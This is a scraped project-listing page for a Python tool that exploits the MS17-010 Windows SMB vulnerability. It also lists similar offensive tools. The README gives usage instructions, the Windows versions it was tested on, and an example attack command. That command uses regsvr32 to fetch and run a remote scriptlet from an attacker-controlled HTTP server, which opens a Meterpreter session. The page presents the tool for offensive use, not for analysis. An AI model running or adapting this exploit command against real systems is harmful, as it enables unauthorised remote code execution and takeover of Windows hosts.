All Projects → mez-0 → Ms17 010 Python

mez-0 / Ms17 010 Python

Licence: mit
MS17-010: Python and Meterpreter

Programming Languages

python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to Ms17 010 Python

Eggshell
iOS/macOS/Linux Remote Administration Tool
Stars: ✭ 1,286 (+321.64%)
Mutual labels:  exploitation, metasploit, meterpreter
trolo
trolo - an easy to use script for generating Payloads that bypasses antivirus
Stars: ✭ 45 (-85.25%)
Mutual labels:  payload, meterpreter, metasploit
Metasploit Cheat Sheet
Metasploit Cheat Sheet 💣
Stars: ✭ 139 (-54.43%)
Mutual labels:  payload, metasploit, meterpreter
Pysploit
Remote exploitation framework written in Python
Stars: ✭ 37 (-87.87%)
Mutual labels:  exploitation, payload
Mouse
Mouse Framework is an iOS and macOS post-exploitation framework that gives you a command line session with extra functionality between you and a target machine using only a simple Mouse payload. Mouse gives you the power and convenience of uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, escalating privileges, password retrieval, and much more.
Stars: ✭ 186 (-39.02%)
Mutual labels:  payload, metasploit
Hackers Tool Kit
Its a framework filled with alot of options and hacking tools you use directly in the script from brute forcing to payload making im still adding more stuff i now have another tool out called htkl-lite its hackers-tool-kit just not as big and messy to see updates check on my instagram @tuf_unkn0wn or if there are any problems message me on instagram
Stars: ✭ 211 (-30.82%)
Mutual labels:  payload, metasploit
Pakuri
Penetration test Achieve Knowledge Unite Rapid Interface
Stars: ✭ 125 (-59.02%)
Mutual labels:  exploitation, metasploit
Terraform Aws Multi Az Subnets
Terraform module for multi-AZ public and private subnets provisioning
Stars: ✭ 58 (-80.98%)
Mutual labels:  subnet, dynamic
CnC-detection
Detecting PowerShell Empire, Metasploit Meterpreter and Cobalt Strike agents by payload size sequence analysis and host correlation
Stars: ✭ 15 (-95.08%)
Mutual labels:  meterpreter, metasploit
Pentest-Bookmarkz
A collection of useful links for Pentesters
Stars: ✭ 118 (-61.31%)
Mutual labels:  exploitation, metasploit
MsfMania
Python AV Evasion Tools
Stars: ✭ 388 (+27.21%)
Mutual labels:  meterpreter, metasploit
Hackapk
An Advanced Tool For Complete Apk-Modding In Termux ...
Stars: ✭ 180 (-40.98%)
Mutual labels:  payload, metasploit
Proton
Proton Framework is a Windows post-exploitation framework similar to other Windows post-exploitation frameworks. The major difference is that the Proton Framework does most of its operations using Windows Script Host, with compatibility in the core to support a default installation of Windows 2000 with no service packs all the way through Windows 10.
Stars: ✭ 142 (-53.44%)
Mutual labels:  payload, metasploit
Autosploit
Automated Mass Exploiter
Stars: ✭ 4,500 (+1375.41%)
Mutual labels:  exploitation, metasploit
Writeups
This repository contains writeups for various CTFs I've participated in (Including Hack The Box).
Stars: ✭ 61 (-80%)
Mutual labels:  exploitation, payload
Arcanus
ARCANUS is a customized payload generator/handler.
Stars: ✭ 130 (-57.38%)
Mutual labels:  payload, meterpreter
Imgbackdoor
Hide your payload into .jpg file
Stars: ✭ 87 (-71.48%)
Mutual labels:  payload, metasploit
Entropy
Entropy Toolkit is a set of tools to provide Netwave and GoAhead IP webcams attacks. Entropy Toolkit is a powerful toolkit for webcams penetration testing.
Stars: ✭ 126 (-58.69%)
Mutual labels:  payload, metasploit
Z0172CK-Tools
Hacking Tools Z0172CK
Stars: ✭ 31 (-89.84%)
Mutual labels:  payload, metasploit
maalik
Feature-rich Post Exploitation Framework with Network Pivoting capabilities.
Stars: ✭ 75 (-75.41%)
Mutual labels:  exploitation, payload

MS17-010: Python

All credit goes to Worawit:

Worawit Wang: GitHub

Worawit Wang: Twitter

Worawit Wang released a collection of Python exploits for MS17-010. These tools worked far more reliably than the Metasploit modules but didn't have much of a payload besides writing a pwned.txt to the C:/. However, Worawit Wang did add functionality for creating a service.

Korey McKinley wrote an article utilising that function to create a service which used regsvr32 to call back to Meterpreter and create a full Meterpreter connection. I'd never seen that path to exploitation, so I thought I'd modify zzz_exploit.py with Korey's logic and make the script more dynamic and user friendly.

However, the module Korey used in that blog article was not available in my version of Metasploit. It is now called web_delivery.

There are two pieces, zzz_checker.py and zzz_exploit.py. Both self-explanatory.


Exploit Usage

usage: zzz_exploit.py [-h] [-u] [-p] -t  -c  [-P] [--version]

Tested versions:
1 Windows 2016 x64
2 Windows 10 Pro Vuild 10240 x64
3 Windows 2012 R2 x64
4 Windows 8.1 x64
5 Windows 2008 R2 SP1 x64
6 Windows 7 SP1 x64
7 Windows 2008 SP1 x64
8 Windows 2003 R2 SP2 x64
9 Windows XP SP2 x64
10  Windows 8.1 x86
11  Windows 7 SP1 x86
12  Windows 2008 SP1 x86
13  Windows 2003 SP2 x86
14  Windows XP SP3 x86
15  Windows 2000 SP4 x86

optional arguments:
  -h, --help        show this help message and exit
  -u , --user       username to authenticate with
  -p , --password   password for specified user
  -t , --target     Target for exploitation
  -c , --command    Command to add to service
  -P , --pipe       Pipe to connect to
  --version         show program's version number and exit

Example: python zzz_exploit -t 192.168.0.1 -c 'regsvr32 /s /n /u /i:http://192.168.0.1:9000/1EsrjpXH2pWdgd.sct scrobj.dll'

Checker Usage

usage: zzz_checker.py [-h] -t  [-c]

MS17-010 Checker

optional arguments:
  -h, --help           show this help message and exit
  -t , --targets       Target(s) to attack
  -c , --credentials   Credentials to use
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].